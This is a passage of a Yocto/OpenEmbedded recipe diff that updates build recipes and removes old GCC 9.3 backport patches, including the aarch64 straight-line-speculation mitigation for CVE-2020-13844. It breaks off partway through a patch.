50@@ -2567,6 +2569,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
51 /* Found it. */
52 break;
53
54+ if (verneed_data->d_size - vn_offset < verneed->vn_next)
55+ break;
56+
57 vn_offset += verneed->vn_next;
58 verneed = (verneed->vn_next == 0
59 ? NULL
60@@ -2602,6 +2607,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
61 /* Found the definition. */
62 break;
63
64+ if (verdef_data->d_size - vd_offset < verdef->vd_next)
65+ break;
66+
67 vd_offset += verdef->vd_next;
68 verdef = (verdef->vd_next == 0
69 ? NULL
70--
712.25.1
72
diff --git a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
index b043c96543..ef5d83ebaf 100644
--- a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
+++ b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Utility for modifying GPT disk partitioning" 1SUMMARY = "Utility for modifying GPT disk partitioning"
2DESCRIPTION = "GPT fdisk is a disk partitioning tool loosely modeled on Linux fdisk, but used for modifying GUID Partition Table (GPT) disks. The related FixParts utility fixes some common problems on Master Boot Record (MBR) disks." 2DESCRIPTION = "GPT fdisk is a disk partitioning tool loosely modeled on Linux fdisk, but used for modifying GUID Partition Table (GPT) disks. The related FixParts utility fixes some common problems on Master Boot Record (MBR) disks."
3HOMEPAGE = "https://sourceforge.net/projects/gptfdisk/"
3 4
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5LIC_FILES_CHKSUM = "file://COPYING;md5=59530bdf33659b29e73d4adb9f9f6552" 6LIC_FILES_CHKSUM = "file://COPYING;md5=59530bdf33659b29e73d4adb9f9f6552"
diff --git a/meta/recipes-devtools/file/file_5.38.bb b/meta/recipes-devtools/file/file_5.38.bb
index 2d62ead10b..b19bf03986 100644
--- a/meta/recipes-devtools/file/file_5.38.bb
+++ b/meta/recipes-devtools/file/file_5.38.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd
11DEPENDS = "file-replacement-native" 11DEPENDS = "file-replacement-native"
12DEPENDS_class-native = "bzip2-replacement-native" 12DEPENDS_class-native = "bzip2-replacement-native"
13 13
14SRC_URI = "git://github.com/file/file.git" 14SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https"
15 15
16SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c" 16SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c"
17S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/flex/flex_2.6.4.bb b/meta/recipes-devtools/flex/flex_2.6.4.bb
index 1d43d2228a..50d3bf8de1 100644
--- a/meta/recipes-devtools/flex/flex_2.6.4.bb
+++ b/meta/recipes-devtools/flex/flex_2.6.4.bb
@@ -26,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4
26UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases" 26UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases"
27UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar" 27UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar"
28 28
29# Disputed - yes there is stack exhaustion but no bug and it is building the
30# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address
31# https://github.com/westes/flex/issues/414
32CVE_CHECK_WHITELIST += "CVE-2019-6293"
33
29inherit autotools gettext texinfo ptest 34inherit autotools gettext texinfo ptest
30 35
31M4 = "${bindir}/m4" 36M4 = "${bindir}/m4"
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch b/meta/recipes-devtools/gcc/gcc-9.3/0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch
deleted file mode 100644
index dc1039dcc8..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch
+++ /dev/null
@@ -1,119 +0,0 @@
1Upstream-Status: Backport [https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=97b668f9a8c6ec565c278a60e7d1492a6932e409]
2Signed-off-by: Jon Mason <jon.mason@arm.com>
3
4From 97b668f9a8c6ec565c278a60e7d1492a6932e409 Mon Sep 17 00:00:00 2001
5From: Matthias Klose <doko@ubuntu.com>
6Date: Tue, 6 Oct 2020 13:41:37 +0200
7Subject: [PATCH] Backport fix for PR/tree-optimization/97236 - fix bad use of
8 VMAT_CONTIGUOUS
9
10This avoids using VMAT_CONTIGUOUS with single-element interleaving
11when using V1mode vectors. Instead keep VMAT_ELEMENTWISE but
12continue to avoid load-lanes and gathers.
13
142020-10-01 Richard Biener <rguenther@suse.de>
15
16 PR tree-optimization/97236
17 * tree-vect-stmts.c (get_group_load_store_type): Keep
18 VMAT_ELEMENTWISE for single-element vectors.
19
20 * gcc.dg/vect/pr97236.c: New testcase.
21
22(cherry picked from commit 1ab88985631dd2c5a5e3b5c0dce47cf8b6ed2f82)
23---
24 gcc/testsuite/gcc.dg/vect/pr97236.c | 43 +++++++++++++++++++++++++++++
25 gcc/tree-vect-stmts.c | 20 ++++++--------
26 2 files changed, 52 insertions(+), 11 deletions(-)
27 create mode 100644 gcc/testsuite/gcc.dg/vect/pr97236.c
28
29diff --git a/gcc/testsuite/gcc.dg/vect/pr97236.c b/gcc/testsuite/gcc.dg/vect/pr97236.c
30new file mode 100644
31index 000000000000..9d3dc20d953d
32--- /dev/null
33+++ b/gcc/testsuite/gcc.dg/vect/pr97236.c
34@@ -0,0 +1,43 @@
35+typedef unsigned char __uint8_t;
36+typedef __uint8_t uint8_t;
37+typedef struct plane_t {
38+ uint8_t *p_pixels;
39+ int i_lines;
40+ int i_pitch;
41+} plane_t;
42+
43+typedef struct {
44+ plane_t p[5];
45+} picture_t;
46+
47+#define N 4
48+
49+void __attribute__((noipa))
50+picture_Clone(picture_t *picture, picture_t *res)
51+{
52+ for (int i = 0; i < N; i++) {
53+ res->p[i].p_pixels = picture->p[i].p_pixels;
54+ res->p[i].i_lines = picture->p[i].i_lines;
55+ res->p[i].i_pitch = picture->p[i].i_pitch;
56+ }
57+}
58+
59+int
60+main()
61+{
62+ picture_t aaa, bbb;
63+ uint8_t pixels[10] = {1, 1, 1, 1, 1, 1, 1, 1};
64+
65+ for (unsigned i = 0; i < N; i++)
66+ aaa.p[i].p_pixels = pixels;
67+
68+ picture_Clone (&aaa, &bbb);
69+
70+ uint8_t c = 0;
71+ for (unsigned i = 0; i < N; i++)
72+ c += bbb.p[i].p_pixels[0];
73+
74+ if (c != N)
75+ __builtin_abort ();
76+ return 0;
77+}
78diff --git a/gcc/tree-vect-stmts.c b/gcc/tree-vect-stmts.c
79index 507f81b0a0e8..ffbba3441de2 100644
80--- a/gcc/tree-vect-stmts.c
81+++ b/gcc/tree-vect-stmts.c
82@@ -2355,25 +2355,23 @@ get_group_load_store_type (stmt_vec_info stmt_info, tree vectype, bool slp,
83 /* First cope with the degenerate case of a single-element
84 vector. */
85 if (known_eq (TYPE_VECTOR_SUBPARTS (vectype), 1U))
86- *memory_access_type = VMAT_CONTIGUOUS;
87+ ;
88
89 /* Otherwise try using LOAD/STORE_LANES. */
90- if (*memory_access_type == VMAT_ELEMENTWISE
91- && (vls_type == VLS_LOAD
92- ? vect_load_lanes_supported (vectype, group_size, masked_p)
93- : vect_store_lanes_supported (vectype, group_size,
94- masked_p)))
95+ else if (vls_type == VLS_LOAD
96+ ? vect_load_lanes_supported (vectype, group_size, masked_p)
97+ : vect_store_lanes_supported (vectype, group_size,
98+ masked_p))
99 {
100 *memory_access_type = VMAT_LOAD_STORE_LANES;
101 overrun_p = would_overrun_p;
102 }
103
104 /* If that fails, try using permuting loads. */
105- if (*memory_access_type == VMAT_ELEMENTWISE
106- && (vls_type == VLS_LOAD
107- ? vect_grouped_load_supported (vectype, single_element_p,
108- group_size)
109- : vect_grouped_store_supported (vectype, group_size)))
110+ else if (vls_type == VLS_LOAD
111+ ? vect_grouped_load_supported (vectype, single_element_p,
112+ group_size)
113+ : vect_grouped_store_supported (vectype, group_size))
114 {
115 *memory_access_type = VMAT_CONTIGUOUS_PERMUTE;
116 overrun_p = would_overrun_p;
117--
1182.20.1
119
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch b/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
deleted file mode 100644
index a7e29f4bd7..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
+++ /dev/null
@@ -1,204 +0,0 @@
1CVE: CVE-2020-13844
2Upstream-Status: Backport
3Signed-off-by: Ross Burton <ross.burton@arm.com>
4
5From 20da13e395bde597d8337167c712039c8f923c3b Mon Sep 17 00:00:00 2001
6From: Matthew Malcomson <matthew.malcomson@arm.com>
7Date: Thu, 9 Jul 2020 09:11:58 +0100
8Subject: [PATCH 1/3] aarch64: New Straight Line Speculation (SLS) mitigation
9 flags
10
11Here we introduce the flags that will be used for straight line speculation.
12
13The new flag introduced is `-mharden-sls=`.
14This flag can take arguments of `none`, `all`, or a comma seperated list
15of one or more of `retbr` or `blr`.
16`none` indicates no special mitigation of the straight line speculation
17vulnerability.
18`all` requests all mitigations currently implemented.
19`retbr` requests that the RET and BR instructions have a speculation
20barrier inserted after them.
21`blr` requests that BLR instructions are replaced by a BL to a function
22stub using a BR with a speculation barrier after it.
23
24Setting this on a per-function basis using attributes or the like is not
25enabled, but may be in the future.
26
27(cherry picked from commit a9ba2a9b77bec7eacaf066801f22d1c366a2bc86)
28
29gcc/ChangeLog:
30
312020-06-02 Matthew Malcomson <matthew.malcomson@arm.com>
32
33 * config/aarch64/aarch64-protos.h (aarch64_harden_sls_retbr_p):
34 New.
35 (aarch64_harden_sls_blr_p): New.
36 * config/aarch64/aarch64.c (enum aarch64_sls_hardening_type):
37 New.
38 (aarch64_harden_sls_retbr_p): New.
39 (aarch64_harden_sls_blr_p): New.
40 (aarch64_validate_sls_mitigation): New.
41 (aarch64_override_options): Parse options for SLS mitigation.
42 * config/aarch64/aarch64.opt (-mharden-sls): New option.
43 * doc/invoke.texi: Document new option.
44---
45 gcc/config/aarch64/aarch64-protos.h | 3 ++
46 gcc/config/aarch64/aarch64.c | 76 +++++++++++++++++++++++++++++
47 gcc/config/aarch64/aarch64.opt | 4 ++
48 gcc/doc/invoke.texi | 12 +++++
49 4 files changed, 95 insertions(+)
50
51diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
52index c083cad53..31493f412 100644
53--- a/gcc/config/aarch64/aarch64-protos.h
54+++ b/gcc/config/aarch64/aarch64-protos.h
55@@ -644,4 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
56
57 bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
58
59+extern bool aarch64_harden_sls_retbr_p (void);
60+extern bool aarch64_harden_sls_blr_p (void);
61+
62 #endif /* GCC_AARCH64_PROTOS_H */
63diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
64index b452a53af..269ff6c92 100644
65--- a/gcc/config/aarch64/aarch64.c
66+++ b/gcc/config/aarch64/aarch64.c
67@@ -11734,6 +11734,79 @@ aarch64_validate_mcpu (const char *str, const struct processor **res,
68 return false;
69 }
70
71+/* Straight line speculation indicators. */
72+enum aarch64_sls_hardening_type
73+{
74+ SLS_NONE = 0,
75+ SLS_RETBR = 1,
76+ SLS_BLR = 2,
77+ SLS_ALL = 3,
78+};
79+static enum aarch64_sls_hardening_type aarch64_sls_hardening;
80+
81+/* Return whether we should mitigatate Straight Line Speculation for the RET
82+ and BR instructions. */
83+bool
84+aarch64_harden_sls_retbr_p (void)
85+{
86+ return aarch64_sls_hardening & SLS_RETBR;
87+}
88+
89+/* Return whether we should mitigatate Straight Line Speculation for the BLR
90+ instruction. */
91+bool
92+aarch64_harden_sls_blr_p (void)
93+{
94+ return aarch64_sls_hardening & SLS_BLR;
95+}
96+
97+/* As of yet we only allow setting these options globally, in the future we may
98+ allow setting them per function. */
99+static void
100+aarch64_validate_sls_mitigation (const char *const_str)
101+{
102+ char *token_save = NULL;
103+ char *str = NULL;
104+
105+ if (strcmp (const_str, "none") == 0)
106+ {
107+ aarch64_sls_hardening = SLS_NONE;
108+ return;
109+ }
110+ if (strcmp (const_str, "all") == 0)
111+ {
112+ aarch64_sls_hardening = SLS_ALL;
113+ return;
114+ }
115+
116+ char *str_root = xstrdup (const_str);
117+ str = strtok_r (str_root, ",", &token_save);
118+ if (!str)
119+ error ("invalid argument given to %<-mharden-sls=%>");
120+
121+ int temp = SLS_NONE;
122+ while (str)
123+ {
124+ if (strcmp (str, "blr") == 0)
125+ temp |= SLS_BLR;
126+ else if (strcmp (str, "retbr") == 0)
127+ temp |= SLS_RETBR;
128+ else if (strcmp (str, "none") == 0 || strcmp (str, "all") == 0)
129+ {
130+ error ("%<%s%> must be by itself for %<-mharden-sls=%>", str);
131+ break;
132+ }
133+ else
134+ {
135+ error ("invalid argument %<%s%> for %<-mharden-sls=%>", str);
136+ break;
137+ }
138+ str = strtok_r (NULL, ",", &token_save);
139+ }
140+ aarch64_sls_hardening = (aarch64_sls_hardening_type) temp;
141+ free (str_root);
142+}
143+
144 /* Parses CONST_STR for branch protection features specified in
145 aarch64_branch_protect_types, and set any global variables required. Returns
146 the parsing result and assigns LAST_STR to the last processed token from
147@@ -11972,6 +12045,9 @@ aarch64_override_options (void)
148 selected_arch = NULL;
149 selected_tune = NULL;
150
151+ if (aarch64_harden_sls_string)
152+ aarch64_validate_sls_mitigation (aarch64_harden_sls_string);
153+
154 if (aarch64_branch_protection_string)
155 aarch64_validate_mbranch_protection (aarch64_branch_protection_string);
156
157diff --git a/gcc/config/aarch64/aarch64.opt b/gcc/config/aarch64/aarch64.opt
158index 3c6d1cc90..d27ab6df8 100644
159--- a/gcc/config/aarch64/aarch64.opt
160+++ b/gcc/config/aarch64/aarch64.opt
161@@ -71,6 +71,10 @@ mgeneral-regs-only
162 Target Report RejectNegative Mask(GENERAL_REGS_ONLY) Save
163 Generate code which uses only the general registers.
164
165+mharden-sls=
166+Target RejectNegative Joined Var(aarch64_harden_sls_string)
167+Generate code to mitigate against straight line speculation.
168+
169 mfix-cortex-a53-835769
170 Target Report Var(aarch64_fix_a53_err835769) Init(2) Save
171 Workaround for ARM Cortex-A53 Erratum number 835769.
172diff --git a/gcc/doc/invoke.texi b/gcc/doc/invoke.texi
173index 2f7ffe456..5f04a7d2b 100644
174--- a/gcc/doc/invoke.texi
175+++ b/gcc/doc/invoke.texi
176@@ -638,6 +638,7 @@ Objective-C and Objective-C++ Dialects}.
177 -mpc-relative-literal-loads @gol
178 -msign-return-address=@var{scope} @gol
179 -mbranch-protection=@var{none}|@var{standard}|@var{pac-ret}[+@var{leaf}]|@var{bti} @gol
180+-mharden-sls=@var{opts} @gol
181 -march=@var{name} -mcpu=@var{name} -mtune=@var{name} @gol
182 -moverride=@var{string} -mverbose-cost-dump @gol
183 -mstack-protector-guard=@var{guard} -mstack-protector-guard-reg=@var{sysreg} @gol
184@@ -15955,6 +15956,17 @@ argument @samp{leaf} can be used to extend the signing to include leaf
185 functions.
186 @samp{bti} turns on branch target identification mechanism.
187
188+@item -mharden-sls=@var{opts}
189+@opindex mharden-sls
190+Enable compiler hardening against straight line speculation (SLS).
191+@var{opts} is a comma-separated list of the following options:
192+@table @samp
193+@item retbr
194+@item blr
195+@end table
196+In addition, @samp{-mharden-sls=all} enables all SLS hardening while
197+@samp{-mharden-sls=none} disables all SLS hardening.
198+
199 @item -msve-vector-bits=@var{bits}
200 @opindex msve-vector-bits
201 Specify the number of bits in an SVE vector register. This option only has
202--
2032.25.1
204
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch b/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
deleted file mode 100644
index c972088d2b..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
+++ /dev/null
@@ -1,600 +0,0 @@
1CVE: CVE-2020-13844
2Upstream-Status: Backport
3Signed-off-by: Ross Burton <ross.burton@arm.com>
4
5From dc586a749228ecfb71f72ec2ca10e6f7b6874af3 Mon Sep 17 00:00:00 2001
6From: Matthew Malcomson <matthew.malcomson@arm.com>
7Date: Thu, 9 Jul 2020 09:11:59 +0100
8Subject: [PATCH 2/3] aarch64: Introduce SLS mitigation for RET and BR
9 instructions
10
11Instructions following RET or BR are not necessarily executed. In order
12to avoid speculation past RET and BR we can simply append a speculation
13barrier.
14
15Since these speculation barriers will not be architecturally executed,
16they are not expected to add a high performance penalty.
17
18The speculation barrier is to be SB when targeting architectures which
19have this enabled, and DSB SY + ISB otherwise.
20
21We add tests for each of the cases where such an instruction was seen.
22
23This is implemented by modifying each machine description pattern that
24emits either a RET or a BR instruction. We choose not to use something
25like `TARGET_ASM_FUNCTION_EPILOGUE` since it does not affect the
26`indirect_jump`, `jump`, `sibcall_insn` and `sibcall_value_insn`
27patterns and we find it preferable to implement the functionality in the
28same way for every pattern.
29
30There is one particular case which is slightly tricky. The
31implementation of TARGET_ASM_TRAMPOLINE_TEMPLATE uses a BR which needs
32to be mitigated against. The trampoline template is used *once* per
33compilation unit, and the TRAMPOLINE_SIZE is exposed to the user via the
34builtin macro __LIBGCC_TRAMPOLINE_SIZE__.
35In the future we may implement function specific attributes to turn on
36and off hardening on a per-function basis.
37The fixed nature of the trampoline described above implies it will be
38safer to ensure this speculation barrier is always used.
39
40Testing:
41 Bootstrap and regtest done on aarch64-none-linux
42 Used a temporary hack(1) to use these options on every test in the
43 testsuite and a script to check that the output never emitted an
44 unmitigated RET or BR.
45
461) Temporary hack was a change to the testsuite to always use
47`-save-temps` and run a script on the assembly output of those
48compilations which produced one to ensure every RET or BR is immediately
49followed by a speculation barrier.
50
51(cherry picked from be178ecd5ac1fe1510d960ff95c66d0ff831afe1)
52
53gcc/ChangeLog:
54
55 * config/aarch64/aarch64-protos.h (aarch64_sls_barrier): New.
56 * config/aarch64/aarch64.c (aarch64_output_casesi): Emit
57 speculation barrier after BR instruction if needs be.
58 (aarch64_trampoline_init): Handle ptr_mode value & adjust size
59 of code copied.
60 (aarch64_sls_barrier): New.
61 (aarch64_asm_trampoline_template): Add needed barriers.
62 * config/aarch64/aarch64.h (AARCH64_ISA_SB): New.
63 (TARGET_SB): New.
64 (TRAMPOLINE_SIZE): Account for barrier.
65 * config/aarch64/aarch64.md (indirect_jump, *casesi_dispatch,
66 simple_return, *do_return, *sibcall_insn, *sibcall_value_insn):
67 Emit barrier if needs be, also account for possible barrier using
68 "sls_length" attribute.
69 (sls_length): New attribute.
70 (length): Determine default using any non-default sls_length
71 value.
72
73gcc/testsuite/ChangeLog:
74
75 * gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c: New test.
76 * gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c:
77 New test.
78 * gcc.target/aarch64/sls-mitigation/sls-mitigation.exp: New file.
79 * lib/target-supports.exp (check_effective_target_aarch64_asm_sb_ok):
80 New proc.
81---
82 gcc/config/aarch64/aarch64-protos.h | 1 +
83 gcc/config/aarch64/aarch64.c | 41 +++++-
84 gcc/config/aarch64/aarch64.h | 10 +-
85 gcc/config/aarch64/aarch64.md | 75 ++++++++---
86 .../sls-mitigation/sls-miti-retbr-pacret.c | 15 +++
87 .../aarch64/sls-mitigation/sls-miti-retbr.c | 119 ++++++++++++++++++
88 .../aarch64/sls-mitigation/sls-mitigation.exp | 73 +++++++++++
89 gcc/testsuite/lib/target-supports.exp | 3 +-
90 8 files changed, 312 insertions(+), 25 deletions(-)
91 create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
92 create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
93 create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
94
95diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
96index 31493f412..885eae893 100644
97--- a/gcc/config/aarch64/aarch64-protos.h
98+++ b/gcc/config/aarch64/aarch64-protos.h
99@@ -644,6 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
100
101 bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
102
103+const char *aarch64_sls_barrier (int);
104 extern bool aarch64_harden_sls_retbr_p (void);
105 extern bool aarch64_harden_sls_blr_p (void);
106
107diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
108index 269ff6c92..dff61105c 100644
109--- a/gcc/config/aarch64/aarch64.c
110+++ b/gcc/config/aarch64/aarch64.c
111@@ -8412,8 +8412,8 @@ aarch64_return_addr (int count, rtx frame ATTRIBUTE_UNUSED)
112 static void
113 aarch64_asm_trampoline_template (FILE *f)
114 {
115- int offset1 = 16;
116- int offset2 = 20;
117+ int offset1 = 24;
118+ int offset2 = 28;
119
120 if (aarch64_bti_enabled ())
121 {
122@@ -8436,6 +8436,17 @@ aarch64_asm_trampoline_template (FILE *f)
123 }
124 asm_fprintf (f, "\tbr\t%s\n", reg_names [IP1_REGNUM]);
125
126+ /* We always emit a speculation barrier.
127+ This is because the same trampoline template is used for every nested
128+ function. Since nested functions are not particularly common or
129+ performant we don't worry too much about the extra instructions to copy
130+ around.
131+ This is not yet a problem, since we have not yet implemented function
132+ specific attributes to choose between hardening against straight line
133+ speculation or not, but such function specific attributes are likely to
134+ happen in the future. */
135+ asm_fprintf (f, "\tdsb\tsy\n\tisb\n");
136+
137 /* The trampoline needs an extra padding instruction. In case if BTI is
138 enabled the padding instruction is replaced by the BTI instruction at
139 the beginning. */
140@@ -8450,10 +8461,14 @@ static void
141 aarch64_trampoline_init (rtx m_tramp, tree fndecl, rtx chain_value)
142 {
143 rtx fnaddr, mem, a_tramp;
144- const int tramp_code_sz = 16;
145+ const int tramp_code_sz = 24;
146
147 /* Don't need to copy the trailing D-words, we fill those in below. */
148- emit_block_move (m_tramp, assemble_trampoline_template (),
149+ /* We create our own memory address in Pmode so that `emit_block_move` can
150+ use parts of the backend which expect Pmode addresses. */
151+ rtx temp = convert_memory_address (Pmode, XEXP (m_tramp, 0));
152+ emit_block_move (gen_rtx_MEM (BLKmode, temp),
153+ assemble_trampoline_template (),
154 GEN_INT (tramp_code_sz), BLOCK_OP_NORMAL);
155 mem = adjust_address (m_tramp, ptr_mode, tramp_code_sz);
156 fnaddr = XEXP (DECL_RTL (fndecl), 0);
157@@ -8640,6 +8655,8 @@ aarch64_output_casesi (rtx *operands)
158 output_asm_insn (buf, operands);
159 output_asm_insn (patterns[index][1], operands);
160 output_asm_insn ("br\t%3", operands);
161+ output_asm_insn (aarch64_sls_barrier (aarch64_harden_sls_retbr_p ()),
162+ operands);
163 assemble_label (asm_out_file, label);
164 return "";
165 }
166@@ -18976,6 +18993,22 @@ aarch64_file_end_indicate_exec_stack ()
167 #undef GNU_PROPERTY_AARCH64_FEATURE_1_BTI
168 #undef GNU_PROPERTY_AARCH64_FEATURE_1_AND
169
170+/* Helper function for straight line speculation.
171+ Return what barrier should be emitted for straight line speculation
172+ mitigation.
173+ When not mitigating against straight line speculation this function returns
174+ an empty string.
175+ When mitigating against straight line speculation, use:
176+ * SB when the v8.5-A SB extension is enabled.
177+ * DSB+ISB otherwise. */
178+const char *
179+aarch64_sls_barrier (int mitigation_required)
180+{
181+ return mitigation_required
182+ ? (TARGET_SB ? "sb" : "dsb\tsy\n\tisb")
183+ : "";
184+}
185+
186 /* Target-specific selftests. */
187
188 #if CHECKING_P
189diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
190index 772a97296..72ddc6fd9 100644
191--- a/gcc/config/aarch64/aarch64.h
192+++ b/gcc/config/aarch64/aarch64.h
193@@ -235,6 +235,7 @@ extern unsigned aarch64_architecture_version;
194 #define AARCH64_ISA_F16FML (aarch64_isa_flags & AARCH64_FL_F16FML)
195 #define AARCH64_ISA_RCPC8_4 (aarch64_isa_flags & AARCH64_FL_RCPC8_4)
196 #define AARCH64_ISA_V8_5 (aarch64_isa_flags & AARCH64_FL_V8_5)
197+#define AARCH64_ISA_SB (aarch64_isa_flags & AARCH64_FL_SB)
198
199 /* Crypto is an optional extension to AdvSIMD. */
200 #define TARGET_CRYPTO (TARGET_SIMD && AARCH64_ISA_CRYPTO)
201@@ -285,6 +286,9 @@ extern unsigned aarch64_architecture_version;
202 #define TARGET_FIX_ERR_A53_835769_DEFAULT 1
203 #endif
204
205+/* SB instruction is enabled through +sb. */
206+#define TARGET_SB (AARCH64_ISA_SB)
207+
208 /* Apply the workaround for Cortex-A53 erratum 835769. */
209 #define TARGET_FIX_ERR_A53_835769 \
210 ((aarch64_fix_a53_err835769 == 2) \
211@@ -931,8 +935,10 @@ typedef struct
212
213 #define RETURN_ADDR_RTX aarch64_return_addr
214
215-/* BTI c + 3 insns + 2 pointer-sized entries. */
216-#define TRAMPOLINE_SIZE (TARGET_ILP32 ? 24 : 32)
217+/* BTI c + 3 insns
218+ + sls barrier of DSB + ISB.
219+ + 2 pointer-sized entries. */
220+#define TRAMPOLINE_SIZE (24 + (TARGET_ILP32 ? 8 : 16))
221
222 /* Trampolines contain dwords, so must be dword aligned. */
223 #define TRAMPOLINE_ALIGNMENT 64
224diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
225index cc5a887d4..494aee964 100644
226--- a/gcc/config/aarch64/aarch64.md
227+++ b/gcc/config/aarch64/aarch64.md
228@@ -331,10 +331,25 @@
229 ;; Attribute that specifies whether the alternative uses MOVPRFX.
230 (define_attr "movprfx" "no,yes" (const_string "no"))
231
232+;; Attribute to specify that an alternative has the length of a single
233+;; instruction plus a speculation barrier.
234+(define_attr "sls_length" "none,retbr,casesi" (const_string "none"))
235+
236 (define_attr "length" ""
237 (cond [(eq_attr "movprfx" "yes")
238 (const_int 8)
239- ] (const_int 4)))
240+
241+ (eq_attr "sls_length" "retbr")
242+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 4)
243+ (match_test "TARGET_SB") (const_int 8)]
244+ (const_int 12))
245+
246+ (eq_attr "sls_length" "casesi")
247+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 16)
248+ (match_test "TARGET_SB") (const_int 20)]
249+ (const_int 24))
250+ ]
251+ (const_int 4)))
252
253 ;; Strictly for compatibility with AArch32 in pipeline models, since AArch64 has
254 ;; no predicated insns.
255@@ -370,8 +385,12 @@
256 (define_insn "indirect_jump"
257 [(set (pc) (match_operand:DI 0 "register_operand" "r"))]
258 ""
259- "br\\t%0"
260- [(set_attr "type" "branch")]
261+ {
262+ output_asm_insn ("br\\t%0", operands);
263+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
264+ }
265+ [(set_attr "type" "branch")
266+ (set_attr "sls_length" "retbr")]
267 )
268
269 (define_insn "jump"
270@@ -657,7 +676,7 @@
271 "*
272 return aarch64_output_casesi (operands);
273 "
274- [(set_attr "length" "16")
275+ [(set_attr "sls_length" "casesi")
276 (set_attr "type" "branch")]
277 )
278
279@@ -736,14 +755,18 @@
280 [(return)]
281 ""
282 {
283+ const char *ret = NULL;
284 if (aarch64_return_address_signing_enabled ()
285 && TARGET_ARMV8_3
286 && !crtl->calls_eh_return)
287- return "retaa";
288-
289- return "ret";
290+ ret = "retaa";
291+ else
292+ ret = "ret";
293+ output_asm_insn (ret, operands);
294+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
295 }
296- [(set_attr "type" "branch")]
297+ [(set_attr "type" "branch")
298+ (set_attr "sls_length" "retbr")]
299 )
300
301 (define_expand "return"
302@@ -755,8 +778,12 @@
303 (define_insn "simple_return"
304 [(simple_return)]
305 "aarch64_use_simple_return_insn_p ()"
306- "ret"
307- [(set_attr "type" "branch")]
308+ {
309+ output_asm_insn ("ret", operands);
310+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
311+ }
312+ [(set_attr "type" "branch")
313+ (set_attr "sls_length" "retbr")]
314 )
315
316 (define_insn "*cb<optab><mode>1"
317@@ -947,10 +974,16 @@
318 (match_operand 1 "" ""))
319 (return)]
320 "SIBLING_CALL_P (insn)"
321- "@
322- br\\t%0
323- b\\t%c0"
324- [(set_attr "type" "branch, branch")]
325+ {
326+ if (which_alternative == 0)
327+ {
328+ output_asm_insn ("br\\t%0", operands);
329+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
330+ }
331+ return "b\\t%c0";
332+ }
333+ [(set_attr "type" "branch, branch")
334+ (set_attr "sls_length" "retbr,none")]
335 )
336
337 (define_insn "*sibcall_value_insn"
338@@ -960,10 +993,16 @@
339 (match_operand 2 "" "")))
340 (return)]
341 "SIBLING_CALL_P (insn)"
342- "@
343- br\\t%1
344- b\\t%c1"
345- [(set_attr "type" "branch, branch")]
346+ {
347+ if (which_alternative == 0)
348+ {
349+ output_asm_insn ("br\\t%1", operands);
350+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
